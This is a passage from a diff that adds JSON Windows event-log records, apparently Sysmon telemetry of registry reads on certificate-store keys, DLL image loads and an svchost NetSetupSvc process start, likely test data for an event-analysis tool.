"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupEngine.dll", + "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573793230000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s NetSetupSvc", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1332, + "ppid": 568, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "create", + "timestamp": 131883573793580000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "image_load", + "image_name": "svchost.exe", + "image_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupApi.dll", + "image_path": "C:\\Windows\\System32\\NetSetupApi.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 